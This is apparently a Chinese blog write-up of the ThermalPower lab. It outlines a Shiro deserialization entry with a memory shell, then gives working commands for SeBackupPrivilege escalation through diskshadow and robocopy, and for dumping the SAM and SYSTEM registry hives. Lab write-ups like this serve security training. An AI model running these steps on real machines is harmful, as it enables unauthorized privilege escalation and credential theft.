春秋云境之thermalpower

春秋云境之thermalpower

入口机

heapdump内存泄露,利用工具解密拿到key,然后打一个shiro反序列化注入内存马拿shell

SeBackupPrivilege 提权

SeBackupPrivilege 权限用来实现备份操作,允许文件内容检索,即使文件上的安全描述符可能未授予此类访问权限。

diskshadow 是 Windows 的内置功能,可以帮助创建备份。参考 hackingarticles,可以在本地或 DC 进行权限提升。

Privilege 靶场中也使用该方式实现权限提升。ThermalPower 只涉及本地权限提升,不涉及 DC。

powershell使用 EnableSeBackupPrivilege.ps1启用 SeBackupPrivilege:

1
Import-Module .\EnableSeBackupPrivilege.ps1

新建 s.dsh 文件

1
2
3
4
set context persistent nowriters
add volume c: alias mydrive
create
expose %mydrive% z:

如果是linux生成的要转换编码和间距

1
unix2dos s.dsh

以管理员权限在 PowerShell 中执行命令。当前用户路径权限不够,需要在 C 盘新建目录 Temp,执行 diskshadow 并拷贝 flag02

1
2
3
4
5
PS C:\Users\chenhua\Desktop> cd C:\
PS C:\Users\chenhua\Desktop> mkdir Temp
PS C:\Temp> diskshadow /s s.dsh
PS C:\Temp> dir z:\Users\Administrator\flag\
PS C:\Temp> robocopy /b z:\Users\Administrator\flag\ . flag02.txt

也可以保存注册表来获取本地凭证

1
2
3
mkdir c:\Tmp
reg save hklm\system c:\Tmp\system
reg save hklm\sam c:\Tmp\sam

春秋云境之thermalpower
http://fearless-123.github.io/2025/09/24/渗透/thermalpower/
作者
fearless123
发布于
2025年9月24日
许可协议